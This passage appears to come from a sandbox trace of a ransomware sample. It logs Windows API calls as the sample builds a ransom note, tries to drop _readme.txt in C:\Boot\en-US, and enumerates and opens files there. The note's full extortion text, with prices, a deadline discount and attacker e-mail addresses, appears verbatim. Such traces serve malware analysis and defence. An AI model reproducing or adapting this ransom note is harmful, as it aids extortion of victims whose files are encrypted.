contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.767] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.769] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*" (normalized: "c:\\boot\\en-us\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.769] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.769] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0178.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.770] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0178.770] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.772] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0178.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.772] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0178.772] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.774] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0178.774] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.775] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.775] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0178.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) 